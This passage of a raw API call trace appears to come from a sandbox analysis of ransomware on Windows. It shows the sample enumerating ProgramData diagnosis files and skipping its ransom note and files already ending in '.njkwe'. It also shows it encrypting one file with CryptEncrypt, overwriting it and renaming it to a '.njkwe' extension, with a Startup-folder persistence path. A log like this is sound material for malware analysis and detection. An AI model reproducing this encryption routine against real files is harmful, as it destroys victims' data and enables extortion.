lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.217] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0073.217] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.217] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\." (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.217] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4d8e7d9f, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0x4d8e7d9f, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.217] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.217] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.218] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.218] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.218] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.218] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\..") returned 60 [0073.218] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.218] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.218] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0073.218] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.218] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0073.218] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.218] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\.." (normalized: "c:\\programdata\\microsoft\\diagnosis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.218] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x69d9f6fd, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x69d9f6fd, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x69e5dfd5, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x623b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="telemetry.ASM-WindowsDefault.json", cAlternateFileName="TELEME~1.JSO")) returned 1 [0073.218] lstrcmpiW (lpString1="telemetry.ASM-WindowsDefault.json", lpString2="Windows") returned -1 [0073.218] lstrcmpiW (lpString1="telemetry.ASM-WindowsDefault.json", lpString2="$Recycle.bin") returned 1 [0073.218] lstrcmpiW (lpString1="telemetry.ASM-WindowsDefault.json", lpString2="System Volume Information") returned 1 [0073.218] lstrcmpiW (lpString1="telemetry.ASM-WindowsDefault.json", lpString2="Program Files") returned 1 [0073.218] lstrcmpiW (lpString1="telemetry.ASM-WindowsDefault.json", lpString2="Program Files (x86)") returned 1 [0073.218] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json") returned 91 [0073.218] StrStrIW (lpFirst="telemetry.ASM-WindowsDefault.json", lpSrch=".njkwe") returned 0x0 [0073.218] lstrcmpW (lpString1="telemetry.ASM-WindowsDefault.json", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.218] lstrcmpW (lpString1="telemetry.ASM-WindowsDefault.json", lpString2="taridd") returned 1 [0073.218] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.218] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.219] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a8b18c4, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5eab1ff, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5eab1ff, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x44f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="telemetry.ASM-WindowsDefault.json.bk", cAlternateFileName="TELEME~1.BK")) returned 1 [0073.219] lstrcmpiW (lpString1="telemetry.ASM-WindowsDefault.json.bk", lpString2="Windows") returned -1 [0073.219] lstrcmpiW (lpString1="telemetry.ASM-WindowsDefault.json.bk", lpString2="$Recycle.bin") returned 1 [0073.219] lstrcmpiW (lpString1="telemetry.ASM-WindowsDefault.json.bk", lpString2="System Volume Information") returned 1 [0073.219] lstrcmpiW (lpString1="telemetry.ASM-WindowsDefault.json.bk", lpString2="Program Files") returned 1 [0073.219] lstrcmpiW (lpString1="telemetry.ASM-WindowsDefault.json.bk", lpString2="Program Files (x86)") returned 1 [0073.219] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json.bk") returned 94 [0073.219] StrStrIW (lpFirst="telemetry.ASM-WindowsDefault.json.bk", lpSrch=".njkwe") returned 0x0 [0073.219] lstrcmpW (lpString1="telemetry.ASM-WindowsDefault.json.bk", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.219] lstrcmpW (lpString1="telemetry.ASM-WindowsDefault.json.bk", lpString2="taridd") returned 1 [0073.219] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json.bk", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.219] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json.bk" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json.bk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0073.220] GetTickCount () returned 0x1152aa6 [0073.220] GetTickCount () returned 0x1152aa6 [0073.220] GetTickCount () returned 0x1152aa6 [0073.220] GetTickCount () returned 0x1152aa6 [0073.220] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0073.220] GetProcessHeap () returned 0xbe0000 [0073.220] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0073.220] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x44f, lpOverlapped=0x0) returned 1 [0073.222] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffbb1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.222] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x44f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x44f, lpOverlapped=0x0) returned 1 [0073.222] GetProcessHeap () returned 0xbe0000 [0073.222] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0073.222] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.222] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0073.222] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0073.222] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0073.222] CloseHandle (hObject=0x434) returned 1 [0073.223] GetProcessHeap () returned 0xbe0000 [0073.223] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0073.223] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json.bk_r00t_{3sXlE5}.njkwe") returned 114 [0073.223] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json.bk" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json.bk"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json.bk_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json.bk_r00t_{3sxle5}.njkwe")) returned 1 [0073.223] GetProcessHeap () returned 0xbe0000 [0073.223] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0073.223] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xb0c71bce, ftCreationTime.dwHighDateTime=0x1d327be, ftLastAccessTime.dwLowDateTime=0xb0c71bce, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0xb0fb9083, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="TELEMETRY.ASM-WINDOWSSQ.json", cAlternateFileName="TELEME~4.JSO")) returned 1 [0073.223] lstrcmpiW (lpString1="TELEMETRY.ASM-WINDOWSSQ.json", lpString2="Windows") returned -1 [0073.223] lstrcmpiW (lpString1="TELEMETRY.ASM-WINDOWSSQ.json", lpString2="$Recycle.bin") returned 1 [0073.223] lstrcmpiW (lpString1="TELEMETRY.ASM-WINDOWSSQ.json", lpString2="System Volume Information") returned 1 [0073.223] lstrcmpiW (lpString1="TELEMETRY.ASM-WINDOWSSQ.json", lpString2="Program Files") returned 1 [0073.223] lstrcmpiW (lpString1="TELEMETRY.ASM-WINDOWSSQ.json", lpString2="Program Files (x86)") returned 1 [0073.224] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\TELEMETRY.ASM-WINDOWSSQ.json") returned 86 [0073.224] StrStrIW (lpFirst="TELEMETRY.ASM-WINDOWSSQ.json", lpSrch=".njkwe") returned 0x0 [0073.224] lstrcmpW (lpString1="TELEMETRY.ASM-WINDOWSSQ.json", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.224] lstrcmpW (lpString1="TELEMETRY.ASM-WINDOWSSQ.json", lpString2="taridd") returned 1 [0073.224] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\TELEMETRY.ASM-WINDOWSSQ.json", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.224] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\TELEMETRY.ASM-WINDOWSSQ.json" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowssq.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.225] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x2d95e660, ftCreationTime.dwHighDateTime=0x1d336e0, ftLastAccessTime.dwLowDateTime=0x2d95e660, ftLastAccessTime.dwHighDateTime=0x1d336e0, ftLastWriteTime.dwLowDateTime=0x2e6edc8f, ftLastWriteTime.dwHighDateTime=0x1d336e0, nFileSizeHigh=0x0, nFileSizeLow=0x90, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="telemetry.P-ARIA-194626ba46434f9ab441dd7ebda2aa64-5f64bebb-ac28-4cc7-bd52-570c8fe077c9-7717.json", cAlternateFileName="TEA386~1.JSO")) returned 1 [0073.225] lstrcmpiW (lpString1="telemetry.P-ARIA-194626ba46434f9ab441dd7ebda2aa64-5f64bebb-ac28-4cc7-bd52-570c8fe077c9-7717.json", lpString2="Windows") returned -1 [0073.225] lstrcmpiW (lpString1="telemetry.P-ARIA-194626ba46434f9ab441dd7ebda2aa64-5f64bebb-ac28-4cc7-bd52-570c8fe077c9-7717.json", lpString2="$Recycle.bin") returned 1 [0073.225] lstrcmpiW (lpString1="telemetry.P-ARIA-194626ba46434f9ab441dd7ebda2aa64-5f64bebb-ac28-4cc7-bd52-570c8fe077c9-7717.json", lpString2="System Volume Information") returned 1 [0073.225] lstrcmpiW (lpString1="telemetry.P-ARIA-194626ba46434f9ab441dd7ebda2aa64-5f64bebb-ac28-4cc7-bd52-570c8fe077c9-7717.json", lpString2="Program Files") returned 1 [0073.225] lstrcmpiW (lpString1="telemetry.P-ARIA-194626ba46434f9ab441dd7ebda2aa64-5f64bebb-ac28-4cc7-bd52-570c8fe077c9-7717.json", lpString2="Program Files (x86)") returned 1 [0073.225] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.P-ARIA-194626ba46434f9ab441dd7ebda2aa64-5f64bebb-ac28-4cc7-bd52-570c8fe077c9-7717.json") returned 154 [0073.225] StrStrIW (lpFirst="telemetry.P-ARIA-194626ba46434f9ab441dd7ebda2aa64-5f64bebb-ac28-4cc7-bd52-570c8fe077c9-7717.json", lpSrch=".njkwe") returned 0x0 [0073.225] lstrcmpW (lpString1="telemetry.P-ARIA-194626ba46434f9ab441dd7ebda2aa64-5f64bebb-ac28-4cc7-bd52-570c8fe077c9-7717.json", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.225] lstrcmpW (lpString1="telemetry.P-ARIA-194626ba46434f9ab441dd7ebda2aa64-5f64bebb-ac28-4cc7-bd52-570c8fe077c9-7717.json", lpString2="taridd") returned 1 [0073.225] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.P-ARIA-194626ba46434f9ab441dd7ebda2aa64", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.225] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.P-ARIA-194626ba46434f9ab441dd7ebda2aa64-5f64bebb-ac28-4cc7-bd52-570c8fe077c9-7717.json" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\telemetry.p-aria-194626ba46434f9ab441dd7ebda2aa64-5f64bebb-ac28-4cc7-bd52-570c8fe077c9-7717.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.226] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7ea85252, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x7ea85252, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x7f139471, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x90, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="telemetry.P-ARIA-31f8f00f75ee43d4996762625b6917f2-ce77d96f-eec8-4063-a05a-09720f5bbf1b-7138.json", cAlternateFileName="TELEME~2.JSO")) returned 1 [0073.226] lstrcmpiW (lpString1="telemetry.P-ARIA-31f8f00f75ee43d4996762625b6917f2-ce77d96f-eec8-4063-a05a-09720f5bbf1b-7138.json", lpString2="Windows") returned -1 [0073.226] lstrcmpiW (lpString1="telemetry.P-ARIA-31f8f00f75ee43d4996762625b6917f2-ce77d96f-eec8-4063-a05a-09720f5bbf1b-7138.json", lpString2="$Recycle.bin") returned 1 [0073.226] lstrcmpiW (lpString1="telemetry.P-ARIA-31f8f00f75ee43d4996762625b6917f2-ce77d96f-eec8-4063-a05a-09720f5bbf1b-7138.json", lpString2="System Volume Information") returned 1 [0073.226] lstrcmpiW (lpString1="telemetry.P-ARIA-31f8f00f75ee43d4996762625b6917f2-ce77d96f-eec8-4063-a05a-09720f5bbf1b-7138.json", lpString2="Program Files") returned 1 [0073.226] lstrcmpiW (lpString1="telemetry.P-ARIA-31f8f00f75ee43d4996762625b6917f2-ce77d96f-eec8-4063-a05a-09720f5bbf1b-7138.json", lpString2="Program Files (x86)") returned 1 [0073.226] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.P-ARIA-31f8f00f75ee43d4996762625b6917f2-ce77d96f-eec8-4063-a05a-09720f5bbf1b-7138.json") returned 154 [0073.226] StrStrIW (lpFirst="telemetry.P-ARIA-31f8f00f75ee43d4996762625b6917f2-ce77d96f-eec8-4063-a05a-09720f5bbf1b-7138.json", lpSrch=".njkwe") returned 0x0 [0073.226] lstrcmpW (lpString1="telemetry.P-ARIA-31f8f00f75ee43d4996762625b6917f2-ce77d96f-eec8-4063-a05a-09720f5bbf1b-7138.json", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.226] lstrcmpW (lpString1="telemetry.P-ARIA-31f8f00f75ee43d4996762625b6917f2-ce77d96f-eec8-4063-a05a-09720f5bbf1b-7138.json", lpString2="taridd") returned 1 [0073.226] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.P-ARIA-31f8f00f75ee43d4996762625b6917f2", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.226] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.P-ARIA-31f8f00f75ee43d4996762625b6917f2-ce77d96f-eec8-4063-a05a-09720f5bbf1b-7138.json" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\telemetry.p-aria-31f8f00f75ee43d4996762625b6917f2-ce77d96f-eec8-4063-a05a-09720f5bbf1b-7138.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.226] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7f139471, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x7f139471, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x7f4f45ae, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x90, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="telemetry.P-ARIA-5476d0c4a7a347909c4b8a13078d4390-f8bdcecf-243f-40f8-b7c3-b9c44a57dead-7230.json", cAlternateFileName="TELEME~3.JSO")) returned 1 [0073.226] lstrcmpiW (lpString1="telemetry.P-ARIA-5476d0c4a7a347909c4b8a13078d4390-f8bdcecf-243f-40f8-b7c3-b9c44a57dead-7230.json", lpString2="Windows") returned -1 [0073.226] lstrcmpiW (lpString1="telemetry.P-ARIA-5476d0c4a7a347909c4b8a13078d4390-f8bdcecf-243f-40f8-b7c3-b9c44a57dead-7230.json", lpString2="$Recycle.bin") returned 1 [0073.226] lstrcmpiW (lpString1="telemetry.P-ARIA-5476d0c4a7a347909c4b8a13078d4390-f8bdcecf-243f-40f8-b7c3-b9c44a57dead-7230.json", lpString2="System Volume Information") returned 1 [0073.226] lstrcmpiW (lpString1="telemetry.P-ARIA-5476d0c4a7a347909c4b8a13078d4390-f8bdcecf-243f-40f8-b7c3-b9c44a57dead-7230.json", lpString2="Program Files") returned 1 [0073.227] lstrcmpiW (lpString1="telemetry.P-ARIA-5476d0c4a7a347909c4b8a13078d4390-f8bdcecf-243f-40f8-b7c3-b9c44a57dead-7230.json", lpString2="Program Files (x86)") returned 1 [0073.227] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.P-ARIA-5476d0c4a7a347909c4b8a13078d4390-f8bdcecf-243f-40f8-b7c3-b9c44a57dead-7230.json") returned 154 [0073.227] StrStrIW (lpFirst="telemetry.P-ARIA-5476d0c4a7a347909c4b8a13078d4390-f8bdcecf-243f-40f8-b7c3-b9c44a57dead-7230.json", lpSrch=".njkwe") returned 0x0 [0073.227] lstrcmpW (lpString1="telemetry.P-ARIA-5476d0c4a7a347909c4b8a13078d4390-f8bdcecf-243f-40f8-b7c3-b9c44a57dead-7230.json", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.227] lstrcmpW (lpString1="telemetry.P-ARIA-5476d0c4a7a347909c4b8a13078d4390-f8bdcecf-243f-40f8-b7c3-b9c44a57dead-7230.json", lpString2="taridd") returned 1 [0073.227] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.P-ARIA-5476d0c4a7a347909c4b8a13078d4390", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.227] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.P-ARIA-5476d0c4a7a347909c4b8a13078d4390-f8bdcecf-243f-40f8-b7c3-b9c44a57dead-7230.json" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\telemetry.p-aria-5476d0c4a7a347909c4b8a13078d4390-f8bdcecf-243f-40f8-b7c3-b9c44a57dead-7230.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.227] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x698688ac, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x698688ac, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x69d06e63, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0xba4e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="utc.app.json", cAlternateFileName="UTCAPP~1.JSO")) returned 1 [0073.227] lstrcmpiW (lpString1="utc.app.json", lpString2="Windows") returned -1 [0073.227] lstrcmpiW (lpString1="utc.app.json", lpString2="$Recycle.bin") returned 1 [0073.227] lstrcmpiW (lpString1="utc.app.json", lpString2="System Volume Information") returned 1 [0073.227] lstrcmpiW (lpString1="utc.app.json", lpString2="Program Files") returned 1 [0073.227] lstrcmpiW (lpString1="utc.app.json", lpString2="Program Files (x86)") returned 1 [0073.227] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json") returned 70 [0073.228] StrStrIW (lpFirst="utc.app.json", lpSrch=".njkwe") returned 0x0 [0073.228] lstrcmpW (lpString1="utc.app.json", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.228] lstrcmpW (lpString1="utc.app.json", lpString2="taridd") returned 1 [0073.228] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.228] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.228] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a8b18c4, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5eab1ff, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5ed1465, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x67f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="utc.app.json.bk", 